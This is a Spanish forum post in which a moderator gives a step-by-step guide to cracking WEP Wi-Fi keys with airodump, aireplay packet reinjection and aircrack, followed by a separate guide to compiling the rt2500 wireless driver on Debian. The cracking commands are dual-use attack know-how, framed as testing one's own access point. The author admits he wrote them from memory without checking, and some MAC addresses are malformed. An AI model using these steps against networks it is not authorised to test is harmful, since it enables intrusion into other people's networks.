Resultados 1 al 20 de 117

[Como] Seguridad inalámbrica: WEP (Crackear WEP)

Ver modo hilado

Mensaje anterior Mensaje anterior   Próximo mensaje Próximo mensaje
  1. #1 [Como] Seguridad inalámbrica: WEP (Crackear WEP) 
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    [Como] Seguridad inalámbrica: WEP


    Hay ya varios manuales, pero ahí va una mini guía:

    -Descargar Troppix1.2. Esta livecd ya tiene los controladores para esta tarjeta (y la mayoría de ellas, sólo que para algunas sería recomendable tener las últimas versiones.. Por ejemplo para las atheros). Quemar el cd y obviamente arrancar el equipo con él.
    -Luego sería más o menos así:

    Código:
    iwlist ra0 scan
    Con esto escaneamos las redes al alcance. Nos daría un resultado similar a éste(es un ejemplo, en realidad al momento de escribir esto tengo 22 entradas en la lista ;D ):
    Código:
              Cell 01 - Address: 00:03:C9:BB:CC::DD
                        Mode:Managed
                        ESSID:"Essid1"
                        Encryption ***:on
                        Channel:11
                        Quality:0/100  Signal level:-62 dBm  Noise level:-202 dBm
              Cell 02 - Address: 00:03:C9:EE:FF:11
                        Mode:Managed
                        ESSID:"Essid2"
                        Encryption ***:on
                        Channel:6
                        Quality:0/100  Signal level:-71 dBm  Noise level:-193 dBm
    Suponiendo que queremos probar la seguridad de la primera entrada de la lista, y teniendo en cuenta que ya disponemos de las herramientas necesarias en nuestro sistema, comenzamos a hacer el trabajo. : P

    Código:
    airodump ra0 captura1 11
    Con este comando hacemos que la tarjeta entre en modo monitor y se ponga a "escuchar" en el canal 11.

    Código:
    iwconfig ra0 rate 1
    Este comando es muy recomendable ejecutarlo, ya que al bajar la velocidad de transmisión a 1 megabyte hacemos que la comunicación sea más estable a mayor distancia.

    Código:
    aireplay -1 0 -e Essid1 -a 00:03:C9:BB:CC::DD -h 55:44:33:22:11:00 ra0
    Sólo clientes debidamente autenticados y asociados al AP podrán "entablar comunicación" con éste. El ataque -1 lo que hace es asocias la dirección MAC que definimos en -h con el AP con ESSID 'Essid1' y BSSID (esto es la MAC del AP) 00:03:C9:BB:CC:D

    Ahora, y si no recibimos paquetes de deautenticación, estamos asociados al AP. O mejor dicho está la MAC 00:03:C9:BB:CC:D asociada al AP

    Necesitaremos aproximadamente un mínimo de un millón de paquetes encriptados para poder averiguar la clave WEP que se está utilizando para cifrar la comunicación. Si pretendemos capturar este volumen de datos de forma pasiva (sólo "oyendo") pues hay que esperar sentados. Y mucho tiempo por cierto. Es por ello por lo que se usa la reinyección.


    La reinyección consiste en básicamente capturar un paquete ARP para modificarlo ligeramente y enviárselo al AP. Éste, aunque fuera para mandarnos a hacer gárgaras, nos responde con un paquete también cifrado, pero con un nuevo vector de inicialización. Estos vectores de inicialización diferentes son justo lo que necesitamos.

    Si en el comando que escribimos anteriormente para ejecutar airodump escribiésemos un '1' al final, entonces le estaríamos diciendo que sólo capturase los vectores de inicialización (de aquí en adelante IVs), en lugar de los paquetes difrados completos. El comando quedaría así:

    Código:
    airodump ra0 captura1 11 1
    Pasamos a reinyectar, como si fuésemos el cliente asociado:

    Código:
    aireplay -3 -b 00:03:C9:BB:CC::DD -h 55:44:33:22:11:00 ra0
    Debemos esperar. Vamos, mode_paciencia=on, ya que hasta que no capturemos ese ARP no comenzará la reinyección.

    Cuando ésta se produzcan veremos como el valor de #data comienza a subir rápidamente. Todos esos paquetes quedarán almacenados en el archivo de captura que airodump ha creado al iniciarse. Pero ojo, se perderán si reiniciamos, ya que estamos trabajando con una livecd. Hay dos soluciones alternativas: Usar un linux instalada al disco duro (recomiendo ésta por supuesto) o guardar la captura en algún tipo de medio.

    Una vez tenemos ese ansiado millón de paquetes podemos probar a lanzar aircrack sobre él para ver si nos da la clave.

    Desde el mismo directorio donde lanzamos la captura:
    Código:
    aircrack *.cap
    hará que aircrack se ponga manos a la obra. Si todo ha ido bien, dará sus frutos, y habremos demostrado una vez más que nuestro AP es vulnerable.



    Troppix 1.2:
    http://tinyurl.com/rp9fu (Pobierz para descargar)

    Cómo instalar el módulo para nuestra tarjeta inalámbrica en linux (debian)


    En esta guía explicaré cómo instalar el módulo encargado de controlar una tarjeta inalámbrica con chipset rt2500.


    Para poder añadir módulos a nuestro sistema debemos tener instaladas en éste bien las fuente o bien los headers del kernel que estemos usando.

    En debian es bastante sencillo, ya que el mismo comando averiguará la versión del kernel que estamos usando y nos instalará los headers adecuados:

    Código:
    apt-get install kernel-headers-$(uname -r)
    Una vez tengamos las cabeceras (headers) del kernel necesitaremos algunos programas más. Para estar seguros instalaremos el paquete buil-essential:

    Código:
    apt-get install build-essential
    Luego de esto descargamos las fuentes de la última versión de los drivers para la tarjeta.

    Para esta guía usaré: rt2500 PCI/PCMCIA nightly CVS tarball: rt2500-CVS. Las diferentes versiones de este driver las podéis encontrar en http://rt2x00.serialmonkey.com/wiki/index.php/Downloads

    Bien, vamos al lío.

    Antes de nada, por cuestiones personales de organización l o que yo hago es cambiar a un directorio donde poder operar sin líos innecesarios:

    Código:
    cd /usr
    En este directorio no tenemos permisos de escritura como usuarios ordinarios, por lo que para mayor facilidad podemos hacernos root desde ya

    Código:
    su
    tras introducir el password de root ya tenemos los privilegios de superuser. Pasamos a descargar el paquete con el módulo

    Código:
    wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
    Una vez lo tenemos descargado lo podemos ver con

    Código:
    ls
    Ahora lo descomprimimos

    Código:
    tar -xvzf rt2500-cvs-daily.tar.gz
    Esto nos creará una carpeta cuyo nombre comienza por 'rt'. Entramos en ese directorio

    Código:
    cd rt*
    Si tenemos todo lo necesario bastará con compilar el controlador


    Código:
    cd Module;make
    e instalarlo


    Código:
    make install
    Ahora ya debemos poder iniciar el módulo. Para ello bastará con

    Código:
    modprobe rt2500
    Y deberá aparecer una nueva interfaz en nuestro sistema llamada 'ra0'. La podemos ver con

    Código:
    ifconfig -a
    Si queremos configurar la conexión inalámbrica necesitaremos las wireless-tools. Pero eso ya es otro manual : P (próximamente)





    Salu2




    * Este manual lo hago de memoria, ya que ahora mismo no me encuentro ante un linux en que comprobar los comandos y demás, sino ante mi nuevo OpenBSD (si no lo digo exploto )

    Salu2
    Última edición por j8k6f4v9j; 08-07-2006 a las 16:25

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

Temas similares

  1. Como acceso a mi red inalambrica?
    Por dadeto en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 5
    Último mensaje: 07-08-2011, 14:28
  2. Crackear seguridad WEP
    Por welvis30 en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 31
    Último mensaje: 28-12-2009, 14:53
  3. [Como] Seguridad inalámbrica: WEP (Crackear WEP)
    Por j8k6f4v9j en el foro INGENIERIA INVERSA
    Respuestas: 45
    Último mensaje: 17-10-2007, 07:57
  4. como conecto dos pc por red inalambrica ?
    Por dfbckey2 en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 1
    Último mensaje: 26-11-2006, 14:37
  5. Respuestas: 3
    Último mensaje: 27-06-2006, 12:28

Marcadores

Marcadores